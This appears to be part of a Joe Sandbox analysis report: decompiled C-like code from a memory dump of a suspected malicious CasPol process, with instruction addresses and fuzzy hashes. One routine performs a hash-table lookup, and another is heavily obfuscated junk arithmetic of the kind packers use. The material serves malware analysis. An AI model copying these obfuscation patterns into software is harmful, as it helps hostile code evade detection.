                                                                							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                                                                							_t316 = _v32;
                                                                							L21:
                                                                							_t406 = _v24;
                                                                							while(1) {
                                                                								_t385 =  *_t385;
                                                                								_v12 = _t385;
                                                                								if((_t385 & 0x00000001) != 0) {
                                                                									break;
                                                                								}
                                                                								if(_t316 == ( *(_t385 + 4) & _t406)) {
                                                                									L26:
                                                                									if(_t385 == 0) {
                                                                										goto L35;
                                                                									}
                                                                									_t177 = E016FE7EB(_t385, _v16);
                                                                									if(_t177 != 0) {
                                                                										_t406 = _v12;
                                                                										goto L31;
                                                                									}
                                                                									_t385 = _v12;
                                                                									goto L18;
                                                                								}
                                                                							}
                                                                							_t385 = 0;
                                                                							_v12 = 0;
                                                                							goto L26;
                                                                						}
                                                                					}
                                                                					_t419 = _t404 - 1;
                                                                					if(_t419 == 0) {
                                                                						L15:
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						_t425 =  &(_t425[1]);
                                                                						goto L16;
                                                                					}
                                                                					_t420 = _t419 - 1;
                                                                					if(_t420 == 0) {
                                                                						L14:
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						_t425 =  &(_t425[1]);
                                                                						goto L15;
                                                                					}
                                                                					_t421 = _t420 - 1;
                                                                					if(_t421 == 0) {
                                                                						L13:
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						_t425 =  &(_t425[1]);
                                                                						goto L14;
                                                                					}
                                                                					_t422 = _t421 - 1;
                                                                					if(_t422 == 0) {
                                                                						L12:
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						_t425 =  &(_t425[1]);
                                                                						goto L13;
                                                                					}
                                                                					_t423 = _t422 - 1;
                                                                					if(_t423 == 0) {
                                                                						L11:
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						_t425 =  &(_t425[1]);
                                                                						goto L12;
                                                                					}
                                                                					if(_t423 != 1) {
                                                                						goto L17;
                                                                					} else {
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						_t425 =  &(_t425[1]);
                                                                						goto L11;
                                                                					}
                                                                				} else {
                                                                					_t401 = _t403 >> 3;
                                                                					_t403 = _t403 + _t401 * 0xfffffff8;
                                                                					do {
                                                                						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                                                                						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                                                                						_t288 = _t425[7] & 0x000000ff;
                                                                						_t425 =  &(_t425[8]);
                                                                						_t289 = _t310 + _t383 + _t288;
                                                                						_t401 = _t401 - 1;
                                                                					} while (_t401 != 0);
                                                                					goto L3;
                                                                				}
                                                                			}
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe9ba
                                                                0x016fe9c1
                                                                0x016fe9cf
                                                                0x00000000
                                                                0x016fe9cf
                                                                0x016fe9c3
                                                                0x00000000
                                                                0x016fe9c3
                                                                0x016fe9ab
                                                                0x016fe9ad
                                                                0x016fe9af
                                                                0x00000000
                                                                0x016fe9af
                                                                0x016fe924
                                                                0x016fe8b7
                                                                0x016fe8ba
                                                                0x016fe902
                                                                0x016fe908
                                                                0x016fe90a
                                                                0x00000000
                                                                0x016fe90a
                                                                0x016fe8bc
                                                                0x016fe8bf
                                                                0x016fe8f9
                                                                0x016fe8ff
                                                                0x016fe901
                                                                0x00000000
                                                                0x016fe901
                                                                0x016fe8c1
                                                                0x016fe8c4
                                                                0x016fe8f0
                                                                0x016fe8f6
                                                                0x016fe8f8
                                                                0x00000000
                                                                0x016fe8f8
                                                                0x016fe8c6
                                                                0x016fe8c9
                                                                0x016fe8e7
                                                                0x016fe8ed
                                                                0x016fe8ef
                                                                0x00000000
                                                                0x016fe8ef
                                                                0x016fe8cb
                                                                0x016fe8ce
                                                                0x016fe8de
                                                                0x016fe8e4
                                                                0x016fe8e6
                                                                0x00000000
                                                                0x016fe8e6
                                                                0x016fe8d3
                                                                0x00000000
                                                                0x016fe8d5
                                                                0x016fe8db
                                                                0x016fe8dd
                                                                0x00000000
                                                                0x016fe8dd
                                                                0x016fe853
                                                                0x016fe855
                                                                0x016fe85b
                                                                0x016fe85d
                                                                0x016fe897
                                                                0x016fe89c
                                                                0x016fe8a2
                                                                0x016fe8a6
                                                                0x016fe8ab
                                                                0x016fe8ad
                                                                0x016fe8ad
                                                                0x00000000
                                                                0x016fe85d

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb1f2b4ba4f72d13b6d4239acb00917b397233dffcc41d3d02080e477fc8454a
                                                                • Instruction ID: b6593d10c0e9a4f29bf8d8fef4bcd3cf29791fc86f5145f548aff62175a18afb
                                                                • Opcode Fuzzy Hash: bb1f2b4ba4f72d13b6d4239acb00917b397233dffcc41d3d02080e477fc8454a
                                                                • Instruction Fuzzy Hash: F102A172E006168BCB18CFADCD9167EBFF6AF88200B1A816DD556EB391D735E901CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 50%
                                                                			E00421F9F(signed int __eax, signed int __ebx, intOrPtr __ecx, signed char __edx, void* __edi, signed int __esi) {
                                                                				signed int _t53;
                                                                				signed int _t54;
                                                                				intOrPtr _t56;
                                                                				signed char _t58;
                                                                				signed int _t60;
                                                                				signed int _t61;
                                                                				signed int _t64;
                                                                
                                                                				_t60 = __esi;
                                                                				_t58 = __edx;
                                                                				_t56 = __ecx;
                                                                				_t54 = __ebx;
                                                                				_t53 = __eax;
                                                                				_push(__ebx);
                                                                				 *0x5fa31dc0 =  *0x5fa31dc0 - __eax;
                                                                				 *0xaba8cea9 =  *0xaba8cea9 - __esi;
                                                                				asm("sbb [0x121975ee], ecx");
                                                                				_push( *0xfafb31d4);
                                                                				if((_t64 |  *0x7e40aafb) < 0) {
                                                                					L1:
                                                                					asm("sbb [0xc36efb09], edx");
                                                                					asm("adc [0x767ba821], ebx");
                                                                					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
                                                                					_t53 = _t53 & 0x0000000c;
                                                                					_t61 = (_t61 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
                                                                					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
                                                                					asm("sbb ebp, [0x8771e3b]");
                                                                					_push(_t61);
                                                                					_t60 = _t60 &  *0x912dd0fb;
                                                                					_t58 = _t58 & 0x00000020;
                                                                					asm("rol byte [0xf89935f2], 0x22");
                                                                					asm("rol dword [0xfbe9540d], 0x6c");
                                                                					 *0x9459ca0a = _t56;
                                                                					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
                                                                					asm("adc bl, [0xc320ed3c]");
                                                                					asm("scasb");
                                                                					_t56 =  *0x9459ca0a - 1;
                                                                					 *0xaab74829 =  *0xaab74829 ^ _t53;
                                                                					asm("rcl dword [0x7f106817], 0x35");
                                                                					asm("adc eax, [0x9d56ea15]");
                                                                					_t54 = _t54 +  *0x5ceec7ba &  *0x3b22d9f7;
                                                                					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
                                                                					goto L1;
                                                                				}
                                                                				asm("sbb ebp, [0x9a8f6272]");
                                                                				__esi = __esi + 1;
                                                                				 *0x1862fdd7 =  *0x1862fdd7 >> 0x9c;
                                                                				_push( *0xf8b45f6e);
                                                                				asm("sbb ebp, [0x196aab0e]");
                                                                				__ecx = __ecx | 0xa3a919c8;
                                                                				asm("sbb [0x4750a32e], edi");
                                                                				__esi = __esi +  *0x4327d1a1;
                                                                				__bl = __bl ^  *0x798db3f2;
                                                                				 *0x1b0f7423 =  *0x1b0f7423 + __ecx;
                                                                				asm("cmpsw");
                                                                				_pop(__edx);
                                                                				__eax =  *0xd0cd7109;
                                                                				__eax =  *0xb9ca4a15;
                                                                				__ah = __ah & 0x00000038;
                                                                				_pop(__edi);
                                                                				asm("stosd");
                                                                				asm("adc [0xcd0bb7d9], eax");
                                                                				_t10 = __eax;
                                                                				__eax =  *0xc5211dd9;
                                                                				 *0xc5211dd9 = _t10;
                                                                				__esp = __eax;
                                                                				__esp = 0x2b4e6c91;
                                                                				 *0x888bc184 = __dl;
                                                                				_pop(__esp);
                                                                				__edx = __edx &  *0x8e681d33;
                                                                				asm("rcl dword [0x74e2cd1f], 0x7c");
                                                                				asm("sbb eax, [0xe5790765]");
                                                                				asm("lodsd");
                                                                				__edx = __edx |  *0xd7735ccf;
                                                                				 *0x628d0b11 =  *0x628d0b11 << 0x70;
                                                                				__ah = __ah + 0xca;
                                                                				__ah = __ah ^ 0x0000002a;
                                                                				__eax =  *0x109fb7eb;
                                                                				 *0x109fb7eb =  *0xc5211dd9;
                                                                				__eax =  *0x2a50d527;
                                                                				 *0x2a50d527 =  *0x109fb7eb;
                                                                				asm("sbb al, [0x7ee59c9]");
                                                                				asm("rol dword [0xb17a2a11], 0xdf");
                                                                				__ebp = __ebp ^  *0x610e950d;
                                                                				__ecx = __ecx - 0x162ce9f5;
                                                                				_push( *0xd4e72c97);
                                                                				 *0x9e2107b2 =  *0x9e2107b2 & __dl;
                                                                				__ebx = __ebx - 1;
                                                                				__dh = __dh ^  *0x7a7a3f34;
                                                                				_pop(__ebp);
                                                                				asm("adc [0x3145ebbd], eax");
                                                                				__ebx = __ebx +  *0x264180fa;
                                                                				__ebx = __ebx +  *0xa44e9ed4;
                                                                				if(__ebx > 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0x5b37b0ca =  *0x5b37b0ca + __dh;
                                                                				 *0xadbbbb8f =  *0xadbbbb8f >> 0x33;
                                                                				 *0xfe928ff5 =  *0xfe928ff5 >> 0x28;
                                                                				__eax = __eax ^ 0x16a458f8;
                                                                				asm("scasb");
                                                                				asm("sbb [0x90ed95f6], ah");
                                                                				__edi = 0x182c1d1b;
                                                                				__edi = __eax;
                                                                				__edx = __edx + 0xbb972306;
                                                                				asm("adc [0xd765b23c], al");
                                                                				_pop( *0x265df819);
                                                                				__ebx = __ebx + 1;
                                                                				_pop( *0xa54d01a1);
                                                                				__edi =  *0xa4fe8203;
                                                                				__al = __al - 0x82;
                                                                				asm("rcr dword [0xd83298de], 0x32");
                                                                				__esi = __esi ^  *0xd0cd7167;
                                                                				__edx =  *0x73b7c91d;
                                                                				 *0xaad21cb7 = __ah;
                                                                				__ebx = __ebx |  *0x51230fed;
                                                                				asm("sbb cl, 0x82");
                                                                				__esp = 0x2b4e6c91 ^  *0xe0fb2a31;
                                                                				__eax = __eax +  *0xc7cb36e;
                                                                				asm("ror byte [0x3047ce12], 0x4c");
                                                                				 *0x650ee89b =  *0x650ee89b - __ecx;
                                                                				 *0xdcfc7c19 =  *0xdcfc7c19 ^ 0x2b4e6c91;
                                                                				__ecx = __ecx |  *0x5b1b0d31;
                                                                				__ecx = __ecx - 0xbdbf9096;
                                                                				 *0x1d9fdbdf =  *0x1d9fdbdf >> 0xc;
                                                                				__esi = __esi &  *0x231b6cc0;
                                                                				__edx =  *0x73b7c91d &  *0x7139aadc;
                                                                				__ebx = __ebx -  *0xf811d0cd;
                                                                				 *0x6418c7a0 =  *0x6418c7a0 | __dh;
                                                                				asm("adc al, 0x28");
                                                                				__edi =  *0x564e3a8f;
                                                                				 *0x564e3a8f =  *0xa4fe8203;
                                                                				__ecx = __ecx -  *0xa0d78b13;
                                                                				__ebp = __ebp | 0x1907ee68;
                                                                				__edi =  *0xad110d69 * 0x3103;
                                                                				__esi = __esi - 1;
                                                                				 *0xd787c0ca =  *0xd787c0ca & __dl;
                                                                				__ebp = __ebp - 1;
                                                                				 *0x2d517d05 =  *0x2d517d05 ^ __eax;
                                                                				__ecx = __ecx + 1;
                                                                				asm("rcl dword [0xd0cd7109], 0x9b");
                                                                				__ebp = __ebp &  *0x1b4de019;
                                                                				asm("lodsd");
                                                                				asm("adc edx, [0xea9304ef]");
                                                                				asm("sbb [0xf75fccf0], ebx");
                                                                				L1();
                                                                				asm("adc [0xcd27f634], bh");
                                                                				 *0xf6c311d0 =  *0xf6c311d0 ^ __dl;
                                                                				asm("lodsd");
                                                                				 *0x50701dff =  *0x50701dff - 0x2b4e6c91;
                                                                				if( *0x50701dff >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esi =  *0xe8f0da7d * 0x120c;
                                                                				 *0x7ee92d1 = __edx;
                                                                				asm("adc [0x4ab62e15], edx");
                                                                				asm("sbb eax, 0x2c637e8f");
                                                                				_pop(__esp);
                                                                				__eax = __eax - 0x97c12fb8;
                                                                				__ebx = __ebx - 1;
                                                                				asm("adc esp, 0xc2cb961f");
                                                                				 *0xc3d5501d =  *0xc3d5501d >> 0x7e;
                                                                				__ecx = __ecx - 1;
                                                                				_pop(__esp);
                                                                				__bh = __bh | 0x00000032;
                                                                				asm("adc ebx, [0xcbe77dfb]");
                                                                				__esi =  *0xe8f0da7d * 0x0000120c ^  *0x5f188f61;
                                                                				__ebp = __ebp + 0x3973a6fb;
                                                                				asm("ror dword [0xf2b13499], 0xff");
                                                                				__al = __al ^  *0x19d765b2;
                                                                				_t20 = __edx;
                                                                				__edx =  *0x352fc315;
                                                                				 *0x352fc315 = _t20;
                                                                				asm("sbb eax, [0xec9959dd]");
                                                                				__eax = __eax - 1;
                                                                				asm("adc edi, 0x752acd23");
                                                                				_pop(__ecx);
                                                                				asm("sbb ebp, [0x1847571d]");
                                                                				__dh =  *0xad3f348a;
                                                                				__edi = __edi +  *0xb965bdee;
                                                                				asm("cmpsb");
                                                                				__ebp = __ebp -  *0xffdb760e;
                                                                				__ecx = __ecx +  *0xf346d9d6;
                                                                				__eax =  *0xa64348f0;
                                                                				if(( *0x7cd2fe33 & __edx) != 0) {
                                                                					goto L1;
                                                                				}
                                                                				_pop( *0x109f87b);
                                                                				__edx = __edx &  *0x1b50520d;
                                                                				__ebx = __ebx & 0xb1be2715;
                                                                				asm("adc esp, [0x9db44bdd]");
                                                                				__edx = __edx | 0x845a5701;
                                                                				__edx = __edx |  *0x28af96d1;
                                                                				__ebp =  *0xcd1b8903;
                                                                				__ebx = __ebx &  *0x46dd1dd9;
                                                                				__esp = __eax;
                                                                				__eax = 0xb51c4bf5;
                                                                				__edi = 0x55165809;
                                                                				 *0x696dc7fa =  *0x696dc7fa - __edx;
                                                                				_t25 = __ebx;
                                                                				__ebx =  *0x9b79bff3;
                                                                				 *0x9b79bff3 = _t25;
                                                                				if( *0x696dc7fa >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0xb2221573 =  *0xb2221573 >> 0x5a;
                                                                				__esi = __esi & 0xb321d765;
                                                                				 *0x5410bb83 =  *0x5410bb83 & __ecx;
                                                                				 *0x9f4a98e1 =  *0x9f4a98e1 >> 0xad;
                                                                				__edi = 0x55165809 &  *0x5ab47033;
                                                                				if(0x55165809 < 0) {
                                                                					goto L1;
                                                                				}
                                                                				__ecx =  *0x3029687c * 0xb976;
                                                                				__edi = __edi +  *0xc34df168;
                                                                				__ah = __ah ^  *0x19cba588;
                                                                				_push(0xb51c4bf5);
                                                                				asm("scasb");
                                                                				__ebp = __ebp & 0xe0bac5f7;
                                                                				__ebp = __ebp |  *0xbf1113ea;
                                                                				__edi = __edi - 1;
                                                                				 *0x3d4ac2f8 =  *0x3d4ac2f8 >> 0x98;
                                                                				asm("adc dh, [0xcd71092a]");
                                                                				 *0x2e2115d0 =  *0x2e2115d0 ^ __dh;
                                                                				asm("stosb");
                                                                				 *0x4c5179f6 =  *0x4c5179f6 << 0x3c;
                                                                				__ebx = __ebx ^ 0xcaedaa85;
                                                                				asm("adc ebx, [0x77a9c361]");
                                                                				__edi =  *0x7ba8fa9a;
                                                                				if(__ebx == 0) {
                                                                					goto L1;
                                                                				}
                                                                				__eax = 0xb51c4bf5 ^  *0x1611d974;
                                                                				 *0x1184f4fe =  *0x1184f4fe + __ebp;
                                                                				 *0xc1fcc9c =  *0xc1fcc9c - __ecx;
                                                                				 *0x12171589 =  *0x12171589 + 0x2b4e6c91;
                                                                				_t30 = __al;
                                                                				__al =  *0x7ee64e4;
                                                                				 *0x7ee64e4 = _t30;
                                                                				__ecx = __ecx - 0x6f7a8d11;
                                                                				 *0xf2618718 =  *0xf2618718 << 0x79;
                                                                				 *0x6cd10930 = __ah;
                                                                				 *0x9f7d091c =  *0x9f7d091c >> 0x9a;
                                                                				__bh = 0xe0;
                                                                				__edi = __edi ^ 0x03515bc4;
                                                                				_pop( *0x981f21ce);
                                                                				 *0x3749136d = __esi;
                                                                				if(__edi >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esp = __esp &  *0x11d0cd71;
                                                                				__ecx = __ecx +  *0x26d7f02e;
                                                                				__edi =  *0xcf9d096a * 0xd03;
                                                                				asm("adc edx, [0x25079223]");
                                                                				asm("ror dword [0x676d6de], 0xf2");
                                                                				asm("cmpsw");
                                                                				 *0x885b0f27 = __edi;
                                                                				 *0x8101c1b3 =  *0x8101c1b3 & __dl;
                                                                				asm("sbb bl, 0x8");
                                                                				__edx = __edx | 0xd8ff41cd;
                                                                				__eax = 0x7180bc35;
                                                                				if(0x2b4e6c91 >  *0xd1a67f1f) {
                                                                					goto L1;
                                                                				}
                                                                				__ch = __ch ^ 0x000000ca;
                                                                				 *0x8f60f463 =  *0x8f60f463 << 0xe3;
                                                                				 *0xf8291562 =  *0xf8291562 >> 0xc;
                                                                				 *0x5e6673fa =  *0x5e6673fa >> 0x48;
                                                                				asm("rcl dword [0xe5cb9994], 0x4d");
                                                                				_t35 = __ebp;
                                                                				__ebp =  *0xac103c94;
                                                                				 *0xac103c94 = _t35;
                                                                				if( *0xf8291562 != 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esi = __esi ^ 0x7a81f67b;
                                                                				asm("ror dword [0x1dd9506f], 0x88");
                                                                				__edi = __edi + 1;
                                                                				__eax = __eax & 0xd8512d2f;
                                                                				__ebp = __ebp +  *0x8d3810c4;
                                                                				__ebx = 0xba024d94;
                                                                				_push(__esi);
                                                                				_push( *0x52ad0319);
                                                                				_t36 = __edi;
                                                                				__edi =  *0x158ce20d;
                                                                				 *0x158ce20d = _t36;
                                                                				__edi =  *0xf212a26b * 0x65b2;
                                                                				__ecx = __ecx ^  *0x49287f0d;
                                                                				asm("scasb");
                                                                				if(__ecx > 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("sbb ebx, [0x46a8af77]");
                                                                				 *0x20e4e67 = __edi;
                                                                				_pop(__esp);
                                                                				 *0xaa1a4211 = __edi;
                                                                				__ecx = __ecx +  *0xee0c89d5;
                                                                				__esi =  *0x72d466fd;
                                                                				__esi =  *0x72d466fd | 0xee8e7cc5;
                                                                				asm("rol dword [0x216f0bcd], 0x61");
                                                                				L1();
                                                                				 *0xae2324e8 =  *0xae2324e8 << 0x32;
                                                                				asm("sbb bh, 0x63");
                                                                				asm("sbb ecx, [0x4c8517ce]");
                                                                				if( *0xae2324e8 <= 0) {
                                                                					goto L1;
                                                                				}
                                                                				__edi = __edi | 0x02413476;
                                                                				asm("rcr dword [0x5821d992], 0x8b");
                                                                				 *0x6cf9565 =  *0x6cf9565 & 0xba024d94;
                                                                				_pop( *0x3d11c52f);
                                                                				__bh = 0x000000e0 |  *0x98466a0;
                                                                				asm("sbb eax, 0xbd18a5a9");
                                                                				__eax = 0x7381bc25;
                                                                				_pop(__edi);
                                                                				__cl = __cl &  *0x11e0fdb1;
                                                                				_pop(__ebx);
                                                                				_push(0x7381bc25);
                                                                				 *0x87f1111b =  *0x87f1111b - 0x7381bc25;
                                                                				asm("ror byte [0xfa810cb3], 0xed");
                                                                				 *0xe44f6bf4 =  *0xe44f6bf4 << 0xb9;
                                                                				__edi = __edi + 1;
                                                                				__ecx = __ecx | 0xa4f67792;
                                                                				 *0x302507c8 =  *0x302507c8 << 0x55;
                                                                				asm("lodsd");
                                                                				asm("cmpsb");
                                                                				asm("sbb ch, 0x38");
                                                                				__ebx = 0xffffffffba024d93;
                                                                				asm("sbb ch, 0xc9");
                                                                				 *0x7382de91 =  *0x7382de91 ^ __esi;
                                                                				__ebx = 0xffffffffba024d92;
                                                                				 *0xc987b321 =  *0xc987b321 << 0xae;
                                                                				__ecx =  *0xeda0ba6b * 0x3054;
                                                                				asm("sbb edx, [0x226d1283]");
                                                                				 *0x628f6064 =  *0x628f6064 << 0xce;
                                                                				asm("adc edx, [0xbed5fb15]");
                                                                				__eax = 0x7381bc24;
                                                                				asm("sbb ebp, 0x16ecc6d5");
                                                                				_push(__edx);
                                                                				__edx = __edx - 0xb79bec35;
                                                                				__ecx =  *0x6fc32d69 * 0xcdad;
                                                                				_push(0x7381bc25);
                                                                				__ecx =  *0xf6ad15d9;
                                                                				asm("cmpsw");
                                                                				 *0xa8faa8ce =  *0xa8faa8ce | __edi;
                                                                				asm("ror dword [0xd319132f], 0x3d");
                                                                				__edx = __edx & 0xe0a58739;
                                                                				asm("adc edx, 0xcd0bbefe");
                                                                				_push(0x7381bc25);
                                                                				__esp = __esp +  *0xb40d15d9;
                                                                				asm("rcl dword [0x5ae1e665], 0x5d");
                                                                				__edx = __edx -  *0xfb0bbb9a;
                                                                				__edi = __edi +  *0xf1fbb431;
                                                                				if(__edi < 0) {
                                                                					goto L1;
                                                                				}
                                                                				0xffffffffba024d92 ^  *0x1dd99c26 = 0xba506ad9;
                                                                				__eax =  *0x4713d703;
                                                                				asm("rol dword [0x976b5f6c], 0xf3");
                                                                				 *0xdf942581 =  *0xdf942581 << 0x32;
                                                                				asm("lodsb");
                                                                				__al = __al +  *0xbc030e2c;
                                                                				_pop(__ebx);
                                                                				 *0xc28f2735 =  *0xc28f2735 + 0x2b4e6c91;
                                                                				asm("scasd");
                                                                				asm("rol dword [0x6111d765], 0x97");
                                                                				 *0xc464ff37 =  *0xc464ff37 - __edi;
                                                                				 *0x1003bfe1 =  *0x1003bfe1 ^ __al;
                                                                				 *0x9f62d414 =  *0x9f62d414 >> 0x1d;
                                                                				__eax = 0x7ee64ee;
                                                                				 *0x2c6e901d =  *0x2c6e901d | __ecx;
                                                                				if( *0x2c6e901d != 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("rol dword [0xc3d1ca7a], 0x41");
                                                                				 *0xdd044e2c =  *0xdd044e2c << 0x94;
                                                                				asm("movsb");
                                                                				__esi = 0xba506ad9;
                                                                				if( *0xdd044e2c >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0x5872c771 =  *0x5872c771 | __esi;
                                                                				__edx = __edx - 1;
                                                                				asm("rcl dword [0x9fe4e29], 0xcb");
                                                                				__esp = __esp + 1;
                                                                				asm("sbb [0x6e5ae985], esi");
                                                                				__dl = __dl & 0x000000d7;
                                                                				asm("ror dword [0xd38c2511], 0xc");
                                                                				if(__dl < 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0xe7ec9870 =  *0xe7ec9870 ^ __edi;
                                                                				 *0x6a897a38 =  *0x6a897a38 + __cl;
                                                                				__edx =  *0xb881defa;
                                                                				 *0x191507ee =  *0x191507ee >> 0x26;
                                                                				__ebp =  *0x2589eff1;
                                                                				asm("sbb edx, 0xd046209");
                                                                				__ebx = 0xfffffffffadaefdf;
                                                                				 *0xa1da84d4 =  *0xa1da84d4 & __esi;
                                                                				_t39 = __edi;
                                                                				__edi =  *0xd950cd0b;
                                                                				 *0xd950cd0b = _t39;
                                                                				__edi =  *0x902fcb1d;
                                                                				 *0x902fcb1d =  *0xd950cd0b;
                                                                				asm("scasb");
                                                                				_t41 = __esp;
                                                                				__esp =  *0xf3c38e91;
                                                                				 *0xf3c38e91 = _t41;
                                                                				 *0x124e5e04 =  *0x124e5e04 >> 0x7a;
                                                                				__edi =  *0x186e5681;
                                                                				 *0x186e5681 =  *0x902fcb1d;
                                                                				asm("sbb al, [0x1f50cdc9]");
                                                                				asm("sbb edi, [0x892f2389]");
                                                                				 *0x588a1dd7 =  *0x588a1dd7 << 0xd5;
                                                                				 *0x15c8e199 =  *0x15c8e199 + __ecx;
                                                                				__ch = __ch +  *0x60350bd0;
                                                                				 *0xe834982c =  *0xe834982c >> 0xda;
                                                                				asm("cmpsb");
                                                                				__edi =  *0x186e5681 +  *0x437677de;
                                                                				asm("sbb ebx, 0xf762d403");
                                                                				__esi =  *0xb20cc76a * 0xd765;
                                                                				 *0x2182d50e =  *0x2182d50e << 0x2c;
                                                                				_pop(__eax);
                                                                				__ebx = 0x3778a45;
                                                                				asm("sbb al, [0x4817d20a]");
                                                                				__bl = __bl -  *0x897665c9;
                                                                				if(__bl >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("sbb ecx, 0xc9d34673");
                                                                				__ebx = 0x2363a550;
                                                                				_t51 = __ecx;
                                                                				__ecx =  *0x716f2a65;
                                                                				 *0x716f2a65 = _t51;
                                                                				if(0xba506ad9 >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0x706ddf79 =  *0x706ddf79 << 0x90;
                                                                				_push( *0x378b0d05);
                                                                				__edi = __edi -  *0x95e2063f;
                                                                				 *0x680211d9 = 0x7ee64ee;
                                                                				__bl = __bl ^ 0x0000003a;
                                                                				 *0x35cc929b =  *0x35cc929b | __edi;
                                                                				__edx = __edx |  *0x7cd79681;
                                                                				_t52 = __ecx;
                                                                				__ecx =  *0xf39fca26;
                                                                				 *0xf39fca26 = _t52;
                                                                				__ebp = __ebp ^  *0x93fc1907;
                                                                				 *0xbee10567 =  *0xbee10567 & __esi;
                                                                				asm("adc [0x95d8d09b], esi");
                                                                				__edx = __ebp;
                                                                				__ch =  *0x2efe0bb2;
                                                                				_pop( *0xd525176c);
                                                                				__eax = 0x7ee64ee +  *0x71098ec4;
                                                                				asm("adc edi, [0xc715d0cd]");
                                                                				asm("adc [0x9afc8c2e], eax");
                                                                				__eax = 0x7ee64ee +  *0x71098ec4 + 1;
                                                                				 *0x7d9b68e1 =  *0x7d9b68e1 - 0xe0;
                                                                				_push(0x7ee64ee);
                                                                				 *0xdf6c4fa2 =  *0xdf6c4fa2 - __bl;
                                                                				__ebx = 0x2363a550 -  *0xb07c9ceb;
                                                                				_push(0x7ee64ee);
                                                                				__ebp = __ebp + 0xff0115d9;
                                                                				asm("adc edx, [0x950257ce]");
                                                                				 *0x93c08520 =  *0x93c08520 >> 0x52;
                                                                				 *0xee64300d =  *0xee64300d + __edx;
                                                                				__edx = __edx - 1;
                                                                				__ecx =  *0xf39fca26 |  *0xcd1d8e95;
                                                                				_push(0x7ee64ee);
                                                                				__ebp = __ebp ^  *0xbe8cd94;
                                                                				asm("stosd");
                                                                				_push( *0x3f32efd8);
                                                                				if(__ebp <= 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("adc esp, 0xa652c176");
                                                                				asm("rcl dword [0x95b9af39], 0x7d");
                                                                				_pop(__edi);
                                                                				 *0xcd713763 =  *0xcd713763 ^ __al;
                                                                				__dh = __dh + 0xd0;
                                                                				__edx = __edx -  *0xe4158615;
                                                                				__esp = __esp + 1;
                                                                				_pop(__ebx);
                                                                				asm("stosb");
                                                                				asm("adc ah, 0x12");
                                                                				asm("sbb [0x535018b1], cl");
                                                                				__ecx = __ecx -  *0x112e21c0;
                                                                				_push(0x201dd99b);
                                                                				 *0xa9b689d1 = __edx;
                                                                				 *0xba1998a2 =  *0xba1998a2 + __bh;
                                                                				 *0x5fa21826 =  *0x5fa21826 >> 0xd7;
                                                                				__eax = __eax & 0x0c36e507;
                                                                				__edx =  *0x2d1e8569 * 0xb23c;
                                                                				 *0x116cce38 =  *0x116cce38 & __bl;
                                                                				asm("rcr byte [0x4d2cc412], 0x9b");
                                                                				__ecx = __ecx + 1;
                                                                				__ebx = __ebx &  *0x994419be;
                                                                				asm("adc ecx, 0x7f18d09");
                                                                				asm("ror dword [0x31624b9b], 0xcc");
                                                                				__esp = 0x19d0cd68;
                                                                				 *0xc870bfc1 =  *0xc870bfc1 << 0xf3;
                                                                				if(__edi == 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("rcl dword [0x4b0ac74], 0x53");
                                                                				__esp = 0x19d0cd69;
                                                                				return __eax;
                                                                			}










                                                                0x004221aa
                                                                0x004221ab
                                                                0x004221b2
                                                                0x004221be
                                                                0x004221bf
                                                                0x004221c5
                                                                0x004221cb
                                                                0x004221d6
                                                                0x004221dc
                                                                0x004221e2
                                                                0x004221e3
                                                                0x004221e9
                                                                0x00000000
                                                                0x00000000
                                                                0x004221ef
                                                                0x004221f9
                                                                0x004221ff
                                                                0x00422205
                                                                0x0042220a
                                                                0x0042220b
                                                                0x00422210
                                                                0x00422211
                                                                0x0042221d
                                                                0x0042222a
                                                                0x0042222b
                                                                0x0042222c
                                                                0x0042222f
                                                                0x00422235
                                                                0x0042223b
                                                                0x00422241
                                                                0x00422248
                                                                0x0042224e
                                                                0x0042224e
                                                                0x0042224e
                                                                0x00422254
                                                                0x0042225a
                                                                0x0042225b
                                                                0x00422261
                                                                0x00422262
                                                                0x00422268
                                                                0x00422274
                                                                0x0042227a
                                                                0x0042227b
                                                                0x00422281
                                                                0x00422293
